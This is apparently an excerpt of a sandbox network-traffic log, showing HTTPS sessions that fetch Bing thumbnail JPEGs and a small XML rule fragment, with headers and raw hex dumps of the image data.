                                                                          2024-12-08 19:51:15 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.449814150.171.27.10443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:16 UTC346OUTGET /th?id=OADD2.10239399109665_1344PV668L57B53FJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: tse1.mm.bing.net
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:17 UTC861INHTTP/1.1 200 OK
                                                                          Cache-Control: public, max-age=2592000
                                                                          Content-Length: 685668
                                                                          Content-Type: image/jpeg
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Headers: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Timing-Allow-Origin: *
                                                                          Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                          NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                          X-Cache: CONFIG_NOCACHE
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 5349BBA6F704402F89959C10E38D4423 Ref B: EWR30EDGE1613 Ref C: 2024-12-08T19:51:17Z
                                                                          Date: Sun, 08 Dec 2024 19:51:16 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:17 UTC3517INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1a 1c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 36 20 30 39 3a 33 38 3a 34 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                          Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:06 09:38:418
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 86 26 12 14 37 da ee 5f cb fa ad cc 92 e2 da 3c 3f a3 fe 33 6e ee a9 73 31 ed 63 71 fe ca 0b 40 af 2e b1 f4 5b 63 22 c6 d7 60 f4 d9 bb 6b 6c 7d 76 fa 5f a3 a5 55 e9 f5 f5 16 55 5f 56 a7 65 98 ce 30 eb 36 b5 db f8 df b6 97 0d af 73 3f d2 7f a4 56 1b 46 6d 95 3b 1f 21 ef 61 6e c7 56 2c 73 de d7 87 0f 73 d8 ca c5 94 57 4b 7f c1 b2 b7 d9 75 b6 ab 7d 37 a7 75 06 b2 b6 92 6a 63 5d bb 6d c4 3c 10 e3 ba c0 1b b4 ec b1 de df d1 fe 9d 4c 44 b7 37 7d 35 f5 7f 5c 7c bc 71 92 28 ca 62 52 26 5a 7d 92 ff 00 9a b6 3d 98 b6 d9 66 6b da 19 90 f8 35 5b 63 65 95 80 0b 3d ec 63 b7 55 63 5a ef d1 fb 59 fd 8f 7a b7 8f d2 ad b9 8e c9 3e 90 a6 dd a6 6b 04 35 e0 3b 73 ed d8 e3 4b f1 ec b7 f3 df 53 9e ac d8 dc 3c 5d d6 65 01 75 a0 87 43 e0 80 ef bb db ff 00 4e c5 89 d5 be b2 59 6c
                                                                          Data Ascii: &7_<?3ns1cq@.[c"`kl}v_UU_Ve06s?VFm;!anV,ssWKu}7ujc]m<LD7}5\|q(bR&Z}=fk5[ce=cUcZYz>k5;sKS<]euCNYl
                                                                          2024-12-08 19:51:17 UTC4144INData Raw: a6 8f fb bf f9 69 73 63 2e ff 00 fc 72 ba 0d 37 c6 3e 1e d4 2e e3 b5 83 52 f2 e7 93 fe 59 cb 13 a5 78 a4 fe 62 7c 90 4d fe af fd 5d 1e 6e ff 00 31 13 ce 93 cb a9 4a 6b a9 af b4 85 ed 6b 7c cf a1 77 7f 1f fc b3 a4 f3 6b c3 2c 75 ed 4b 4f f9 ec a6 9a df fe b9 4b 5a 11 f8 ff 00 c4 31 43 2e fb cf 33 cc ff 00 57 24 b1 25 5c 66 db d5 58 89 54 8a 76 e6 3d 8f cd a5 dd 5e 45 75 e3 6f 12 cb fe a3 58 86 df cc 8f fe 59 5a 26 c8 ea 0f f8 4e 3c 4b 71 37 91 fd a5 34 72 7f d3 2b 44 fd e7 fe 3b 47 b4 8b 7b 5c 13 4a da d8 f6 3f 36 9b e6 d7 92 c1 e3 6f 12 f9 31 bf f6 97 fe 42 4a d4 b1 f8 95 3c 53 7f c4 d2 ce 19 23 ff 00 a7 6f 91 ff 00 c2 94 6b 2b ec ca 95 92 d2 68 f4 6f 36 8f 36 b8 6f f8 58 90 3f fa 8d 06 ef fe da ca 89 50 dd 7c 43 91 21 fd c6 8f 0c 7f f5 d6 ef ff 00 b1 a7
                                                                          Data Ascii: isc.r7>.RYxb|M]n1Jkk|wk,uKOKZ1C.3W$%\fXTv=^EuoXYZ&N<Kq74r+D;G{\J?6o1BJ<S#ok+ho66oX?P|C!
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 80 7a a2 6b de 08 b7 bb fb 16 a3 0d a5 c4 92 7f cb 4f b9 0c 7f f0 34 a7 cd 63 e1 4d 4f cc 74 9a 1b 7f 2e 5f 2e 4f f8 98 3b fc df f7 cd 78 b4 f0 5a 5a 5d ff 00 a1 43 fb bf 2e 9b 3c b3 bc 3b 3c ef f5 75 7f d9 b2 53 e6 a7 51 eb dc 98 e7 91 69 a9 d2 4f f2 3d 4b 58 9f c2 f6 ff 00 22 78 f3 ec 57 51 ff 00 ab 8e 28 b7 ff 00 e3 d4 78 73 e2 5f f6 57 fa 2b ea 53 6a 31 ff 00 d7 2d f5 e5 f0 2c 92 cd 1c 1f f2 d2 4a 74 f6 73 a5 df 91 ff 00 3c ff 00 d6 57 5d 3a 71 a6 b9 1c 9d ed 73 93 11 8f 75 1b 94 69 a5 73 de 23 f8 c5 e0 ff 00 b9 3f f6 b5 bc 9f f5 e9 bf ff 00 41 aa 1a c7 c7 0f 0f 5b c3 27 f6 5e 8f ab 5e 4f ff 00 2c fc dd 96 f0 ff 00 e8 5b ff 00 f1 da f0 fb ab 6b bb 49 a3 4f 26 68 fc cf f5 71 53 3c a9 3c ed ef e4 c7 25 77 53 a9 68 fc 57 3c c7 07 39 f6 3d 27 5c f8 e5 e2
                                                                          Data Ascii: zkO4cMOt._.O;xZZ]C.<;<uSQiO=KX"xWQ(xs_W+Sj1-,Jts<W]:qsuis#?A['^^O,[kIO&hqS<<%wShW<9='\
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 9a 5f f6 3f de fe f5 5c 54 61 4d 49 2e 6e 65 6d 1e c1 2b ce 76 7a 72 be db 8f d2 be c8 f0 c7 e4 7e ee 7f 9f f7 72 ca 8f f6 77 fe e3 ff 00 f6 34 78 8e 59 34 fd 26 e7 51 ba 87 ed 10 7f cf b5 b7 df f9 be 5f bb 59 7a 95 8e 9b ac 6a 12 3d ef da e4 8f e4 ff 00 49 8a 2f 93 62 fd ef b9 c7 35 6b 43 68 34 7f 2d 1e 19 ad fe d1 bf ec 52 7f b1 ff 00 02 ac 65 46 09 a9 ad 65 db fe 0f fc 03 68 d4 7c d6 6a cb b9 06 86 b3 e9 f7 72 59 5d 6b 17 76 f6 bf 24 96 d2 4b 2f cf 1a 32 7f ab f9 ab 5a c7 53 92 59 a4 49 ff 00 e5 9c 7f bc 92 2f fd 0e 48 e9 ba ac f3 cb 0d f5 ae a3 67 34 90 79 7f f3 c9 3e e7 fb 95 87 a3 4f a9 79 32 42 fa c6 9f a8 da c7 fe b2 28 b7 f9 d6 e9 f7 7f ef 9f 5a a9 43 eb 71 95 49 a4 9f f5 ae 88 4a 4a 93 50 b3 77 37 ad 5b 52 9b 43 b9 4d 5f fb 3e 39 23 91 fc b8 ec
                                                                          Data Ascii: _?\TaMI.nem+vzr~rw4xY4&Q_Yzj=I/b5kCh4-ReFeh|jrY]kv$K/2ZSYI/Hg4y>Oy2B(ZCqIJJPw7[RCM_>9#
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 35 25 63 aa 35 21 ed 1c 2f a9 d1 6b 1e 5f 93 fe 95 a6 fe ef cc ff 00 96 5f 7e 3f f7 7f d9 a8 27 6b 0b bb 49 34 e4 f2 63 92 4f f5 72 7d ca a1 a6 de 49 f6 bd 97 56 7f 68 8e 3f f5 7f df d9 fe fd 6e 69 50 78 7a 5d 5a da f6 eb fb 42 de 38 e4 fd e5 b7 df 7f f8 03 7d da e7 58 79 c1 6a f6 d7 46 74 46 8b 92 4e e6 45 ae 95 a9 5c 43 e4 41 34 37 1e 5f fd 35 4d f5 3d af 87 2d 26 d7 23 7b eb 38 6e 3f e7 a4 72 fc 8f f2 d7 aa fd 9b e1 9f d9 2e 27 b5 d7 75 68 e7 92 3f f4 79 3c ad 9f bd ff 00 80 c7 f2 b7 d6 b8 e8 ec f4 9b 7f 0f 49 7b aa 4d a8 5b df 5b c9 e6 79 72 fc e9 ff 00 7d 55 43 30 b4 5d db 57 f4 fd 19 d1 1a 31 a3 51 4e 2e e9 6b af 91 24 7e 1a b1 d5 6d 2d ad 53 4d 86 dd 23 91 fe c5 2c 5b e1 9a 0f fc 77 63 57 35 ac 78 2a 7f 3a e5 24 87 ed 11 c7 fb cf 33 ff 00 d9 ae cb
                                                                          Data Ascii: 5%c5!/k__~?'kI4cOr}IVh?niPxz]ZB8}XyjFtFNE\CA47_5M=-&#{8n?r.'uh?y<I{M[[yr}UC0]W1QN.k$~m-SM#,[wcW5x*:$3
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: ce 92 0f 93 f7 9e 57 fe 85 5b d3 ea 16 9a af 96 fe 4c 52 49 1f fa cf dd 55 56 c1 c2 9d 78 d4 50 bc 1f 53 2a 78 e8 4e 9b a7 cd 69 2d 0e 67 4d d4 ee f4 fd 5a e6 7f 27 ed 11 c9 fb cf 33 ca f9 f7 d7 47 a6 ea b6 1a 85 a4 9a 8d ad 9c 56 f7 d6 ff 00 eb 25 fe 3d 9f c4 ad fd ea 2d 74 f8 d3 56 fb 6c 16 7e 5c 7f f4 ca 6f 92 ba 3d 0f fd 36 ef 62 43 ff 00 4c e4 b9 97 fe 59 ff 00 b4 b5 cb 9a 63 30 f0 f7 f9 7d eb 6b ad be f3 7c 32 9d 9e ba 5f b1 8d a6 f8 7a ee 28 6d 92 7d 62 6b 78 e4 ff 00 8f 6f f8 15 6a 5d 78 43 ed 1a 7c 70 3e b1 77 e6 5b dc f9 9f 69 8a 24 fb 9f c5 53 a4 5a f7 9d 73 e7 c3 e5 c1 1c 7f bb f2 a5 4f de 7f b5 56 b4 db e8 12 ee 38 3f 75 fb cf fa 6b bd 37 ff 00 c0 eb c1 c4 66 58 c7 2e 7a 73 5a 6b a5 8d d5 18 45 72 f9 58 ab 06 8d f6 2f b0 c1 3c d0 c9 6b 6f 27
                                                                          Data Ascii: W[LRIUVxPS*xNi-gMZ'3GV%=-tVl~\o=6bCLYc0}k|2_z(m}bkxoj]xC|p>w[i$SZsOV8?uk7fX.zsZkErX/<ko'
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: 3c b9 25 de fe 66 ef f6 eb a7 87 69 60 a1 5a 9b c3 c6 51 9a 8d da 97 9e f6 77 77 be e9 06 2a a4 aa 52 7c df 0d ec 61 e9 56 d2 69 53 49 74 f3 4d 24 f2 7f ab fb 4c 5f 24 7f ee d5 af 15 41 3d 97 ef ee bc 9f de 47 e6 49 1c 71 7c f1 ff 00 c0 5a bb 0d 37 c2 fa 4e 95 a4 db 6b d3 cd ab 49 3c 7f e9 11 c7 73 b1 ed a4 75 a9 2e 9e 7f 19 e9 36 de 21 f1 0e 9b 77 e6 7c f6 f1 dc c5 f7 ee 11 7e e7 ee ff 00 bb 5e d4 b3 ea 4e ba a9 6f 71 3e 59 37 a3 bf 45 15 d7 ae b7 39 16 1d 46 9b 57 d7 b1 c9 f8 67 5c f1 be a7 ab 79 1a 24 37 77 10 47 b2 4f b3 7d c4 d9 5e 8d e2 0b 9b 8f 0f c3 1e af 7d f6 48 ff 00 78 91 dc c9 17 cf 35 be ef f6 2b 8d d6 3f b1 5b 43 92 d7 4e bc bb b7 d6 2d e4 ff 00 59 2e ff 00 f4 84 5f f9 65 fe d3 53 34 af 10 f8 c3 ce 8e c6 08 7e db a9 47 1f fa b8 a2 df f7 7f
                                                                          Data Ascii: <%fi`ZQww*R|aViSItM$L_$A=GIq|Z7NkI<su.6!w|~^Noq>Y7E9FWg\y$7wGO}^}Hx5+?[CN-Y._eS4~G
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: ce c7 50 d2 ff 00 d1 e7 92 37 b7 ff 00 49 95 26 49 22 ff 00 6b fb 95 f3 98 1c 0b a4 a9 62 a9 a6 e4 ee b5 d2 ce da eb af e4 74 d6 c6 2a 69 c5 cb 4f 22 bf c5 88 ae 2f 6d 34 dd 5f fb 4a 18 ee a3 df 07 fd 7c 37 de ae 4f 47 9e 7b df 10 c7 75 e7 79 72 47 ff 00 2c e2 ff 00 96 92 ff 00 7a ba cd 47 5e d6 9e 68 e7 d4 6c f4 fb 89 e3 ff 00 8f 69 22 8b fd 5d 73 5b a4 7d 27 c9 4f b2 59 49 1d cf da 23 93 ca 4d fb db ef 6e 65 af b0 c9 e9 d5 a7 80 fa b4 a2 ba ab ad 6c 9b bf e0 79 55 a4 a7 53 9a 06 be 87 a8 47 ff 00 09 bd f5 eb cd 0e c8 f6 47 1f fc 0b ef 33 55 5d 56 e6 ef 53 d7 2d 9e d6 69 ae 24 f3 1e df ec d2 ff 00 e8 55 97 6b aa cf a5 6b 91 eb 7a 75 9c d1 fe f3 cb 93 f8 d2 49 7f bc bb eb a0 b5 d5 ee ec 66 8f c4 af ac 43 e7 c9 27 99 7b 1d b5 a7 ef a3 ff 00 e2 b3 45 4c 0c
                                                                          Data Ascii: P7I&I"kbt*iO"/m4_J|7OG{uyrG,zG^hli"]s[}'OYI#MnelyUSGG3U]VS-i$UkkzuIfC'{EL
                                                                          2024-12-08 19:51:17 UTC8192INData Raw: b7 96 36 ba 77 da e4 fb 14 6f e6 79 bf 3f 99 b7 fd ff 00 bb 5b 9f 11 ac ff 00 e1 20 d0 ec 5e ca 5f de 7d b7 cc 8f f7 a9 fb 87 ff 00 7b fd ea e0 ac b1 58 2c 72 c2 e2 27 ee 3d 9b d7 95 6b 6f 5f 99 d1 19 42 a4 5c ed ef 79 19 76 b3 eb 5f da d6 c9 fd a5 69 24 77 12 79 72 47 2c 5f b9 ab 5e 24 b1 d7 9a f2 3b a8 74 db 49 12 38 ff 00 7b 24 72 ff 00 ac ff 00 69 59 6b 2f c1 7a e6 b4 9a 8f d8 a4 9b ed 90 69 d2 3c 7f 69 8b ee 48 ff 00 c6 bb 5a 9d 1c ff 00 d8 ff 00 69 d2 e3 87 ed 16 37 b2 3d dc 72 5b 7e e5 36 ef fb 8d b9 ab d6 8e 23 1b 47 13 c9 46 4a c9 2d 17 55 df a5 b4 e8 ce 88 36 e1 a7 53 53 47 be b0 bb d0 e4 7b 5f ed 08 f5 2b 78 ff 00 79 e6 ca ee f2 7f bd ba a2 ba b6 d3 5f 4f 93 54 82 69 ad fe cf fb c9 2c bc af 92 4f f6 a3 6a c6 d7 2f 2e ed fc 4f 6d 05 ac 33 79 1e
                                                                          Data Ascii: 6woy?[ ^_}{X,r'=ko_B\yv_i$wyrG,_^$;tI8{$riYk/zi<iHZi7=r[~6#GFJ-U6SSG{_+xy_OTi,Oj/.Om3y


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.449810150.171.27.10443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:16 UTC375OUTGET /th?id=OADD2.10239399109664_12R6JVR4SJZQSTHCV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: tse1.mm.bing.net
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:17 UTC854INHTTP/1.1 200 OK
                                                                          Cache-Control: public, max-age=2592000
                                                                          Content-Length: 634317
                                                                          Content-Type: image/jpeg
                                                                          X-Cache: TCP_HIT
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Headers: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Timing-Allow-Origin: *
                                                                          Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                          NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 43EF5C4B54A74F318666A04AFA0AD06F Ref B: EWR30EDGE0921 Ref C: 2024-12-08T19:51:17Z
                                                                          Date: Sun, 08 Dec 2024 19:51:17 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:17 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 15 70 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 39 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 34 3a 30 38 3a 30 36 20 30 39 3a 33 38 3a 30 35 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                          Data Ascii: JFIF``pExifMM*bj(1r2i``Adobe Photoshop 25.9 (Windows)2024:08:06 09:38:058
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: bc 8a bb 76 fa 52 78 ef 6b ef 3b 5e c7 74 30 d0 a6 fd dd df 99 cf 78 9b c3 d6 7a dc 68 da 87 97 67 79 6e 8b 2a 5c 43 f3 6f fc 0b 7c df 4e 2b 8c bc be 9f 4b d6 16 c7 50 b4 92 58 f7 ff 00 a3 dc 43 bb 6c ca 3a 1f f6 6b d0 bc 45 68 be 5e d6 9e 0b 7b a5 ff 00 5c e9 f3 79 cb 5c 27 8b 2f e7 d2 35 28 6d ef 2d 27 f2 e5 db ff 00 5c b6 d7 a5 87 fd f4 3d 9b 5c d6 5a 2b d9 fc 99 e7 66 34 61 07 ce 97 2b d3 55 d7 d7 fc cb 91 bd a4 b2 24 d7 10 6d db bb 63 a7 cb f3 74 e4 7f 7a 92 c6 26 82 ea ee f3 fb 4a 46 b5 8a 1d de 4f 96 ca c9 df 35 52 de f2 3d 5a 0d ab e4 5c 2e ff 00 be ef e9 ef 4f 87 51 fb 64 ff 00 67 93 cb f3 2d e5 68 bf bb be b8 5c 6a a5 28 da dd d7 65 f3 39 1f 2b 6a ff 00 22 e5 c4 12 dc 68 68 b0 f9 6b 37 fa d8 5d 3f bd f7 b8 e6 b0 f4 9b c9 ef 6e b6 fd 82 08 99 b7
                                                                          Data Ascii: vRxk;^t0xzhgyn*\Co|N+KPXCl:kEh^{\y\'/5(m-'\=\Z+f4a+U$mctz&JFO5R=Z\.OQdg-h\j(e9+j"hhk7]?n
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 3e fd af 25 6f 53 56 6b cb 69 a0 fb 0e a5 fe b3 7a ff 00 ae 76 6f 9b 6e 7e f7 a7 a5 66 ea d6 92 e9 da 6c d3 5a f9 fe 5c ff 00 eb b7 cf f2 ed 3e ff 00 ec f6 a9 ee 35 1f 3f 46 49 ae 2d 3e 6d 8b f3 a2 7f ec a6 a9 78 a1 ef 1e d6 e2 6d 37 f7 b2 5d 43 b5 d3 ef 2b b0 c7 af f1 57 46 12 35 23 52 30 7a 45 bd 53 7a 5e e4 4a 16 bb b6 b6 f9 8b 70 22 7b 1f b7 6a 1f 35 bd ac df 3e cd d1 32 30 fb 8c 54 e6 aa e9 7e 29 8a 5b af 2e ea 4f dc ef 68 a1 99 11 57 e5 1f fb 37 b5 65 f8 4e e3 51 b3 ba 89 af a4 91 a4 bc f3 17 63 a3 2f 46 f7 e1 b3 5b de 26 b3 6b ad 29 ed e6 f3 16 4b 57 dd 6f 32 7c dd 7f f4 35 c5 7a 55 a9 d1 a7 5b d8 d6 f7 93 d9 a7 b2 eb 65 eb bf 73 28 ca 53 8b 9c 55 99 34 77 f6 6f a6 db b2 cf 1d c2 ae e5 9b 66 df 91 8f af f7 6a 39 0b 4b 3e e8 7c fb 85 b7 89 97 63 ff
                                                                          Data Ascii: >%oSVkizvon~flZ\>5?FI->mxm7]C+WF5#R0zESz^Jp"{j5>20T~)[.OhW7eNQc/F[&k)KWo2|5zU[es(SU4wofj9K>|c
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 1e ba de b3 49 f6 06 89 d9 5f ed 68 db 7f ef b4 dc 2a a3 88 a7 27 65 25 72 65 46 a2 57 71 76 f4 3a f6 0c b4 df 9b cc db 55 74 fd 4e 2b fb 5f b4 59 cf 6b 71 0b 7f cb 68 9f 72 fe 95 2b 5c ca bf dc ad 35 25 58 99 bf bd 4d f9 bf 8a a3 f3 e4 fb bf bb a1 6e 25 6f bd e5 d0 17 44 8a 7f 79 44 9b a9 be 7f f1 79 7b aa 36 9f fe 99 d1 7b 8f 71 f8 dd 26 ea 5f bd f7 a3 db fe e5 46 d3 ed f9 bc ba 74 72 7f d3 4a a6 1a 77 17 fe d9 ee a1 bf bb 43 14 5f f7 a9 19 e3 59 36 f9 9f 35 48 c2 42 be 5f cb 4e f9 4f de 92 88 f6 ff 00 cf 4a 74 91 ee 8f e5 a9 e6 d0 7c a3 7e f4 7b a9 18 ff 00 15 2a c1 fb ca 1a 2d df 33 51 74 c1 21 19 7f 79 ba 97 1f de a6 b2 7f df 34 bb 3f 85 7e f5 26 2b 30 90 7f 15 2f 4a 6f 97 fc 2d 42 ee f3 3f dd a6 16 63 9b fb b4 d6 1b b6 6d a3 0f ff 00 02 a5 54 66 a5
                                                                          Data Ascii: I_h*'e%reFWqv:UtN+_Ykqhr+\5%XMn%oDyDy{6{q&_FtrJwC_Y65HB_NOJt|~{*-3Qt!y4?~&+0/Jo-B?cmTf
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: d2 ba 3f ee a5 86 3e 1a 3f 2d db ef 71 fc 07 e5 cd 4d e2 ab 68 25 f8 79 a7 4d 75 69 f6 29 ad 5f 6d c2 26 df b5 3c 61 5d 15 9f fe 07 ee 71 59 e3 28 d0 c4 63 62 9d a2 f9 b9 5a 8a 57 d1 35 16 d5 93 69 db 4d 3f e0 dd 37 3f 66 e4 bb 7f c3 94 fc 3b 37 8b 34 7d 0e 69 23 fb 5b 5c 44 eb 12 7c 91 b2 cc bb 78 11 b2 1d df 28 fa ab 0a d4 f1 85 ed b2 f8 76 1f b1 db c1 67 aa 5f da 5b b4 cf 70 8c d2 cc a7 f8 53 d3 3d 4f e7 59 df 06 f5 0d 15 ee ed 16 fa 48 2d e6 b5 b7 65 49 bc b6 55 79 0b 7f 1e de 5f fd 9f 4a 67 8d 3c 23 79 7b e2 0d 3f cc d7 63 ba 6f 35 57 63 bf cb 32 ff 00 1b 7f b1 fe eb 75 f6 ae ba ce 82 cd 9d 3c 52 f6 6e 37 95 d2 6b 9b ad ac ae 9a d1 6e fa f6 1c 64 dd 1b c7 5b e8 74 1e 3a d2 59 a4 d2 f5 49 23 f3 5a df 4e db 0d da 3f 95 14 2c 8d b9 97 9f f7 f1 83 d7 a8
                                                                          Data Ascii: ?>?-qMh%yMui)_m&<a]qY(cbZW5iM?7?f;74}i#[\D|x(vg_[pS=OYH-eIUy_Jg<#y{?co5Wc2u<Rn7knd[t:YI#ZN?,
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: da f6 4b 7d 1e 69 23 6f e2 79 a1 9f c8 64 50 bc 75 fb df ee 9f c2 96 eb 47 f3 e4 69 23 92 49 5a 27 fd f4 3e 7a af 45 dc 4f f4 f9 be 95 e3 55 94 61 52 52 ae dc 25 2b eb 64 95 af a7 93 7e 6d 1d 6e 7e ea 51 2a 46 25 b5 be 79 2d e3 8f cc d9 f7 3c 85 6d 8a 7a b7 15 06 9e f0 36 95 6f 67 35 df fa 2c 1f 32 6f 76 f9 24 dd b7 fe 03 9c d5 9d 72 09 f4 b9 fc 9b 59 ee ad e1 df b5 d2 ef 6b 7c db be e7 e0 a6 a8 b5 f5 e5 bd dc cd 34 76 bb be 55 de 89 f2 ee fc 33 5d 94 e6 b1 14 d4 a8 f5 eb 7e df 2f 33 19 49 ad 3a 0d d7 af 2f b4 e8 d2 ea 38 e0 56 57 f9 1f fb f8 5d dc b6 7a d5 1d 3f 5d 9d b6 59 ad 85 ad d2 dc 26 d7 74 db f3 e5 b7 ed 7e fc 35 49 75 3d cc b6 af 24 36 9b 63 95 ff 00 7c fb f7 2b b7 b7 f7 7e f5 61 de 3c b6 ba 8c 32 2b c7 14 9f df 4f 99 5f b7 6a f4 70 d8 58 4e 9f
                                                                          Data Ascii: K}i#oydPuGi#IZ'>zEOUaRR%+d~mn~Q*F%y-<mz6og5,2ov$rYk|4vU3]~/3I:/8VW]z?]Y&t~5Iu=$6c|+~a<2+O_jpXN
